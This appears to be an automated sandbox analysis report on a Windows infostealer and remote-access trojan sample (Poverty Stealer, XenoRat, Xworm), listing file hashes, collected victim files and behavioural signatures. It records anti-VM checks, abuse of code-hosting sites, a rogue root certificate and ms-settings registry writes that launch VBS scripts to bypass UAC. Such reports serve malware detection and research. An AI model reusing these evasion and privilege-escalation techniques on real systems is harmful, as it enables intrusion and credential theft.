| MD5 | 75ec72f5a67d89c8195465e897f6d297 |
| SHA1 | c376f86733290c50a05a35b4ff0899f172e4d105 |
| SHA256 | 6482fa7f04e62079b21486b9e7d7e940c388eb50108c746b73aeac13d2f94737 |
| SHA512 | e3be6ee082e17ccd0162714d8ebb64201a582e8b777b65164801f551bbb4af708692f9c2945fbd881e2837817f08a0e84795eb3d8b49af1a26baefcc4028ac7b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UnpublishClear.docx
| MD5 | c85a6b1c7688f679fc0fa2a2ff7a1506 |
| SHA1 | 78ada134826c854314d3990bd49042d88b1c1de0 |
| SHA256 | 292346147da2c9a4dc1a4f72a4dab6a9fe62e44af4f8a3684a34572d59b58a31 |
| SHA512 | d33bba80df644fde1954476fdcdf18cba28b2cb3b7607c58d212c2cae5642952338af551f851896a9d81ba4ef15fc0fcbd44c3d649b8b6911e226133628b61cf |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UnblockRemove.xlsx
| MD5 | 9dfb29056712e940a2e4aa148b232436 |
| SHA1 | c2dca978b9aa8bf686a515e600528a41dcb84cfb |
| SHA256 | 6a0da09f76064a1a83dff8e4e792f009a13aacab05397332a08f5194ab8348f7 |
| SHA512 | 619b66190603ec19d03d5d95c8e9de50a2346d5bc4cf25626fd18023ba206bfb43f01c49f3aa654b23d7a17f5e4df3bde6fdf1039e2b95d62bfa9674a9c49e48 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SuspendDismount.xlsx
| MD5 | 76585360a52023179fe060b4a59bdf45 |
| SHA1 | 032f9564ce9ae26895f9d5f4cf4f3add7e1b6ef6 |
| SHA256 | d9d1449e8ceff26f09e16fa105fbcdedd2b49aeaf23f49f9cd3a961b243b73c5 |
| SHA512 | 7afe720090286ad5f48b7547fc0a14863f8b7edc1128195b64b83b59303dc4242db2df0573faeb99b08b0a4aa2461d18b5154bc4a48ca4a536a909697245983f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RemoveCopy.xlsx
| MD5 | 8af213bc8aa5ba1580357a175d739a2e |
| SHA1 | 3052b4a396002e72363e24554c0b7ec17b8f515e |
| SHA256 | 3ee951d55b73dde6dafe98494d469f3aa4bf9cef3b2e1f6f0f186fb97d42766c |
| SHA512 | 9adf4dddfdadbea6d339d073fbe43a127cef1ed80c3d8276a8d8b148b7c6e60cd751af7430b47cbbe48af2f8f5df5209e5008fa2a526bb0cabea3f3f9a39000e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\GroupRedo.xlsx
| MD5 | fa8af2fa6ae90d97f0e171736f82d462 |
| SHA1 | 002f0bd8bdea9b2f03690ffcc296df060bfc4093 |
| SHA256 | 4992295ed83341f664a7941153ffc3046f25d921fcb9c9490f6dbf30a36f3b12 |
| SHA512 | 86ba99dbdb174031f4c19bf0dc535db1f98971cc6b455de47ba68c47803e8ddf293d1b4abed07f7b8382cbaeec0878191c1b07424c6a727e0717e22b8043822d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\GetResize.csv
| MD5 | 272bc042a4f3724681a391906e71b85f |
| SHA1 | 1f5415015435611d416fcf3b9782a0ac6bc071b0 |
| SHA256 | 91113d66e0eed950acd75c72b562f831ef89416e8f5da0495cba630c0c212c0a |
| SHA512 | 3791db044d279faa8037f89eeb51b8feb9765da053a1843fb2a0c3a25985c0d29149521329fb0edec8e4b9cb5d4ac3d9860e5d2c3674c7948b10b03cbbd8ee57 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\LimitUse.docx
| MD5 | dfdedb6dcb7e63b801fd2689c22830ad |
| SHA1 | 2552a598004c51db473c4927a651f1f1c3627c1d |
| SHA256 | da701f40f79f15cf9f1fa16fee012b3437cacc2097101d4bbe0557ba7399667c |
| SHA512 | 2609a58ef3886eb3cec13312002fc9153fcb34f7f25e5a397626fa4f822c01a03dfc3c405b3bd74540aa40818c8f0d29cdd28136c8254318f943ca3e865ce4bf |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ImportJoin.docx
| MD5 | ee7d4feadb073841185f7ee01a809564 |
| SHA1 | 9b10610e49048fa449a4b54953e28c7f78c71f95 |
| SHA256 | 188c2852b85a9e9cfcf7360a395384a7d7c296de121524ca5c3f0b1881a28fc4 |
| SHA512 | c14cc7b57f1ac184ca7a4520439ca4ad851eec3917be2201f5b325224f49552f79b3be85f21e2ba39f085424b43c545024edec5d2585e8f58ca0c61ffbb7f619 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\HideUnlock.xlsx
| MD5 | 1de2256173a97e756bc778d8192bd2cf |
| SHA1 | 9e8f05f34dde9197cc305dfd0f350de25bb7831d |
| SHA256 | 1786519e120860078dccb7ca0437f6858442fa54f676c3c71d64c2152f0d88dc |
| SHA512 | 3b7aa73cd094f527669077385f0cec574dc0cf4d82e620fa464319cdbe7f9bd7d47756f34393a8625fd2f67bee3b09b9c4d1aad85e4b9f47f479f3fc91dcd869 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\HideEnable.docx
| MD5 | 474e0358fd50c667c74953e99dcadc20 |
| SHA1 | cf0cbb14549b1bdd9d62d76b1fd265f0cf7b3a4c |
| SHA256 | 914df55668e0e673c41d3ca9479f6bebe42f2031d0e925aa8db521731b912e3d |
| SHA512 | 492db832ded9dbdaeeeba57160528dc1b2ae0dc35c5af50381368a7cb5a554fca559bf5f6a220532c74bf5d3164b0b8d8e9ebf71c8e27ddf369d89b120f658be |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\HideCopy.pdf
| MD5 | 0be31b55c6b879b8f6e9bf92912883a0 |
| SHA1 | a591ea2c585f5f392af33c8256cf58d7176f25c8 |
| SHA256 | d9acfcbfe9ff5ff61a2428cd262a41020758053e5a3c89ad9b5a939d50a7d168 |
| SHA512 | 6386539de9a8b5576d3a46e9903b935de93912aacebb0fec22f392e25bf6cfd76a7d81b4a99d546b56aabdb226d77f91af948428a3fb4bf2a7cc4c665d9a2e20 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\RegisterConfirm.mp3
| MD5 | 8c5e238bea4a1ccdbf9f40d70cda5ebc |
| SHA1 | 606d56bd66e870e93d9a33a730e1270ad49631f6 |
| SHA256 | bf4675cf3a49f8de0dd9c72ad253b0ece139f9cb56a1705cd115856a60b881bf |
| SHA512 | 9ae0b2fc453518f929dd04bcb8e1b32ddceb8187bb5cab66d9cf61c1bf95b3ae4e66339c11e3e6fb7472991dcd1f11c2a9907ccfd4c3b5d628e78e53c0626769 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\ExpandRevoke.docx
| MD5 | 517a51eb2904daedac560a65a813825f |
| SHA1 | 89a8ee1bbb1baf299658fc9c179b505b5203cacb |
| SHA256 | 466b242b91f23704da715678d4e3356ab1eb6b0189a67aebdc9e51830f52d4aa |
| SHA512 | 3cab2716b76bae2501e1235a228f317379f35892aac99902e09f7979f4e751deef44c44edbe7ea60364e60b4d2a8fe52a561204af6e31b2afb99feb663711c15 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\GroupResume.pdf
| MD5 | 6858923b06be6b5002c41e72878a5c7a |
| SHA1 | 86bb0871498c9b82747e2cc89159358ad50399e0 |
| SHA256 | dc84d32fd955579eb772e56dee93dd1bf2ce07bd910820434663d66d61a7dfdc |
| SHA512 | 46a108cea2d4f94d5487937a7b4d378c8576e441e490be48078fff9863d1644ccc2148f906fe7595ed5f1335928e83ae99acb0e097e21dff5a68ec2d43f5fc22 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\MeasureGrant.txt
| MD5 | a7753c094488ccba72a86fcbe5a84628 |
| SHA1 | 81216943c982a2cda74984496bb0aaca1df103f8 |
| SHA256 | 8eb807114481aa160e7c794515b1a81e29bb6fe478b83282491f555ed15d4f35 |
| SHA512 | c6b1254801160a52ff75b6ff1251ff9860dd62dea2377d3ee5fb17a82b30fe83d60c65c9c9ab77807d218697089fb6d7062066b7e02cf76fae758b9b68bb177c |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\MountConvert.csv
| MD5 | 5300fa9bdb2a10e8a4d221801048ad4f |
| SHA1 | 32cc800035b501c6bcaf7ae3a1c1e31bda149474 |
| SHA256 | 98de9704030a50c74b898959dfdab138980de6e224f601f7eba208ca535ae887 |
| SHA512 | 38a1e69bd04665b05bf5303ae7890c46847c005b528d04750cb8cf38637c2ea36646fe488367b79784a9fff734588d4d0c7f5a0e4936a7687b750747a0efb1e4 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\EnableResolve.jpeg
| MD5 | 96f4fb7ddc3cf4210937ece72ce58183 |
| SHA1 | 64b77153aadd017da329dd2a39b6e7d1c936054d |
| SHA256 | e7de89d838a66a5ec743843ce1c5ed82989a4c4a1308e13787eed262b317fb62 |
| SHA512 | 27c5d4c9ea7776dca952b72c21bf53c1e2fa3cc69e61657bdb3f05747218cc4cc1905ebc362c5ba91bdea3d6dcc98866afb53b90ef42ad25bbf064ab2d50b823 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\RegisterGroup.png
| MD5 | 0a5583c20f5e3f8dd22064eac1405be4 |
| SHA1 | 7a6c31c09472f5f60a638c293de19013ffaf176d |
| SHA256 | a5bc0a2997439fe8a054603b675d60a2f5d328a6dfe337261d9b8d794406fa8d |
| SHA512 | 58b74b168dbda3449504ff41bbfca1744f82a68f8f3f4fe4693f2e13febfac001424d489b52dfd66a3f44a748dd60ee4409f5e73984822bbcbff876b681df484 |
C:\Users\Admin\AppData\Local\Temp\ \System\System Info.txt
| MD5 | 92f2737c37817a0f4fb91b7e82e51e29 |
| SHA1 | dff45bb3ed3e2ba310197d74dec07943687551b6 |
| SHA256 | 731a620d34cf25597600185534c3b3b9deec98f092138be8bb7932c0eea6f270 |
| SHA512 | a49577ed30d571dc7095f51598f414c378177a2340b8ae391ce8fd3967221a1735bbe84d1415d5deaf9db0f5da147193bde62f057825bf71e04a0e02eff2894d |
C:\Users\Admin\AppData\Local\Temp\ \System\MAC Addresses.txt
| MD5 | 901abf4d6507fee2ab859dc79d1cf436 |
| SHA1 | b96c1451f16ed38b453445fcb92cffdf815986d0 |
| SHA256 | b5c16229a0e207b6d3b68161bc4c65a7b2b3311860337fca50c5ad5b44ff5a62 |
| SHA512 | 029526f3c5dccaf2cac27b9fbeb441e7422daedbe9f7ebd784905666506f76e8436a23be7092f3c71b3456de6aec382195d07ac54466bdf4bc35092e05763955 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Videos.txt
| MD5 | e140e10b2b43ba6f978bee0aa90afaf7 |
| SHA1 | bbbeb7097ffa9c2daa3206b3f212d3614749c620 |
| SHA256 | c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618 |
| SHA512 | df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Pictures.txt
| MD5 | adfe155fd6d8ae11f7e272e59c535a45 |
| SHA1 | 27cebad2fe657a0d61f70cdff8c291cd7fb19137 |
| SHA256 | 52f2de6d279b3f7ffe8a8acf04136b188ecba35c534d37116d8b7f892025183d |
| SHA512 | 44621b526d0d5dd8144efb35dabec0e214154964f0d829f9124423ebb9c79b174815f1fdaf25187c1dfdaabe2d105e7e9af5b0c51e4986d35ef8d9ecbfe5ee1f |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Music.txt
| MD5 | a913dacfdffe2f5e154750f6e1b9a42f |
| SHA1 | 900a71026467d9ed7a6738acc3ce9b2ce50f742a |
| SHA256 | d90f17e2bb64c7badb4aafd954774e8e155645a22973ac4bbea933e2b000a8e1 |
| SHA512 | 9a53b4d97dd2beaeef034e21b366c934d65a4e849a2290fbdb5950df7954bab403629530132bd7ad5f3f4fd2aee4f82c7cc731bf76eae89e01b5c37b21118c41 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Downloads.txt
| MD5 | 0972bd2ccd693ccc41df930ee3c7ea2a |
| SHA1 | 4e0152264eef681ba9bb1666b5b95d73a324eb10 |
| SHA256 | 3dde0f4e17ff50782b232117046dc9983d52919d91a156eb1002691d61d3e54e |
| SHA512 | 6ef96884c36fbbedf5c4d5f7a0cc5f79c921730a914b98b85b453db57b8f64c2f89b42248ebd575646d1e111010f8027eb63c2f63b6541a1a97328d48c52d58b |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Documents.txt
| MD5 | 609ec4a01d00827240868136bde63985 |
| SHA1 | c6f279019301e768c5cc32411b6ec3582f9a91fc |
| SHA256 | 9795c96d92a74454696eba2f024613e162333deb6876d4b90f63ad7566c7bb32 |
| SHA512 | 358391b4a5118b07b7c7d2387d26249201e56797277a3c332e490ef83e15d9bb8996b201a3ff349269b0d036cc007a6a3ca4121fe82f8ea7adb94f082d9d8512 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Desktop.txt
| MD5 | 35f9c8322a1b498b9d5a1b7e9a7238ed |
| SHA1 | dbaf946ca6c5828795d54911d7ff68895fe2010d |
| SHA256 | c36e257044a6fc44e3effd6e0d5aeaec8eccfe093ec805fdf0f3bcbfe0fd83b5 |
| SHA512 | b2a225fab05a78e6821a06176b7bb50be1775d2c9848f3be0131223869824e81e7cea0df2cf3afa40892a2d9204274aae202b3258ae77915a88d096566bb91b5 |
C:\Users\Admin\AppData\Local\Temp\ \Credentials\Chrome\Chrome Cookies.txt
| MD5 | 1e779a02088a3e7672274c17c508a9e0 |
| SHA1 | bd512a02aaca5b5f6cc65a2e43d5ce51292dce1b |
| SHA256 | 1f5b15642945a59c9006f6f5e412d5a855d5de949687336a7c19960b721361a6 |
| SHA512 | 496b3a01bb00f203a4211777b1b2449b207eefb59af885339dd4dbfcdad50421ad11c55525c63020e90f352bbd2a4d4c914b7c5e17d02662c179e157dc73e4e2 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\TestEnable.jpeg
| MD5 | f8d72f7d5d3a46fafcf7e64adfd729d5 |
| SHA1 | 63106f2acf340e84858091f15fd8973394748cae |
| SHA256 | f4c08cb1a6c7d0f105008e0576da69e32426ba3657e6ced2032dd17514266e17 |
| SHA512 | 2549cd7937c9bebd6c63ee09231b144266825f74071536f7a9f9cc5bc3c2523f0589f64c65543fe7c42a1ef668e456885a5798c40722ddf58ae531480c74e184 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\RestoreWait.jpeg
| MD5 | 373877fb94f1922236d4b9ed08a83154 |
| SHA1 | 35ecd6dc3ab1e05255236d9658e7df7009df65cd |
| SHA256 | afaf33308ff169a405e91478c4419137529e37ba6686a3a2a48210eec478526d |
| SHA512 | 0340a0beca38d56be31a432601aafa33574f76a4efb3a1e0cdc886eb461fc8de109e4f556605182c0e52ed511f54fbf3a57af7b55c852f2e8525317acbaa5680 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\ProtectTest.png
| MD5 | 799a1ed5be2f7a7c82dd95488409503a |
| SHA1 | 9df765545f2320fc470f10e1b643a3bb73c4f8e6 |
| SHA256 | 39b1ead70ff8ab5b57dd14d3f186d972367ab1fc98e852ca0df4b7f8742750b0 |
| SHA512 | f283f831bff5457b12ac17d5da59be892be633e891129b5a4f114670905e8b29b238b8ac569d9505040e5267ec3d3d4787295d030ac7bda1ec1b79d814b02101 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\FormatExit.jpeg
| MD5 | 342060fec8a154a569c2d0b42a4a5651 |
| SHA1 | db3f1861ebd6f92fdf1a834fcdcc6b4ff80113d2 |
| SHA256 | 043a7b479f787eace4cb3f62297ac3a7f3054b6b1d21e3dcc44528794714b655 |
| SHA512 | 8adfe1c2fe7d514f96acb7df0a91c11dcc7e1573b9ebce5f270431e3cd6042bc1ed4bd5716b043ca510763ff561ef1d1dd97f8e5996eeb02d0335ef247a64697 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\CopySearch.jpeg
| MD5 | 9602b019db6e6830dc1e8bdad235e749 |
| SHA1 | 83be1c0de29a637b9e6e00230df21146faff7fe6 |
| SHA256 | d8118bc1a329ec5c9945631579b42a02df701eec031cc927c2eebe4db6544ed5 |
| SHA512 | 9f873ea78d9c2e6765d81fd7615355f8e9cd74d783f42554d6f5deffadd906b287b5f66faeb26a2c62b9e251eaa164d85220df2c80f547363c90e7f67e7a53ea |
C:\Users\Admin\AppData\Local\Temp\Files\si.exe
| MD5 | 52fc73bf68ba53d9a2e6dc1e38fdd155 |
| SHA1 | 35aeb2f281a01bbc32a675bfa377f39d63a9256a |
| SHA256 | 651c40eac524ff5749cfd5d80705d6e2b3d52831e4539b7d2642267b913d0701 |
| SHA512 | 58eeaa3f8cd094a5edbdda1815a212e5321edf0eca7d00556636c3b54fbe8975e030279430d4da037e1fc5074796bc19532326888072f280c89b600f937445b4 |
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
| MD5 | 3b4ed97de29af222837095a7c411b8a1 |
| SHA1 | ea003f86db4cf74e4348e7e43e4732597e04db96 |
| SHA256 | 74656a65e96590a2734384bf89cb9ff677dcedff5f6e937d350b9f46ec52cd0a |
| SHA512 | 2e1d1365163b08310e5112063be8ebd0ec1aa8c20a0872eef021978d6eb04a7b3d50af0a6472c246443585e665df2daa1e1a44a166780a8bf01de098a016e572 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-26 22:53
Reported
2024-11-26 22:55
Platform
win7-20241010-en
Max time kernel
96s
Max time network
124s
Command Line
Signatures
Detect Poverty Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect XenoRat Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Poverty Stealer
Povertystealer family
XenorRat
Xenorat family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\arp.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2628 set thread context of 940 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\1431.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7828.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\9471.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
